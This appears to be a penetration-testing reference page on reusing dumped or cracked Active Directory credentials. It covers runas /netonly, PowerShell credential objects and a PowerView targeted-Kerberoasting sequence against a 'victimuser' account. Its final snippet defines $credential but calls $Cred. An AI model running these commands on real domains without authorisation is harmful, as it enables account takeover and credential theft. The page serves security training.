Impersonation
When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.
RunAs
Powershell
PowerView
RunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.
1
runas /netonly /user:$DOMAIN\$USER "powershell.exe"
Copied!
Since the password cannot be supplied as an argument, the session must be interactive.
In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.
1
# Credential object creation (prompted)
2
$credential = Get-Credential
3
โ€‹
4
# Credential object creation (not prompted)
5
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
6
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
7
โ€‹
8
# Usage
9
Start-Process Notepad.exe -Credential $credential
Copied!
Most of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous "Powershell" tab, the -Credential option has to be supplied with a credential object.
Here is an example for targeted Kerberoasting.
1
# Credential object creation (not prompted)
2
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
3
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
4
โ€‹
5
# Usage
6
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
7
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
8
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl
Copied!
Last modified 8mo ago
Copy link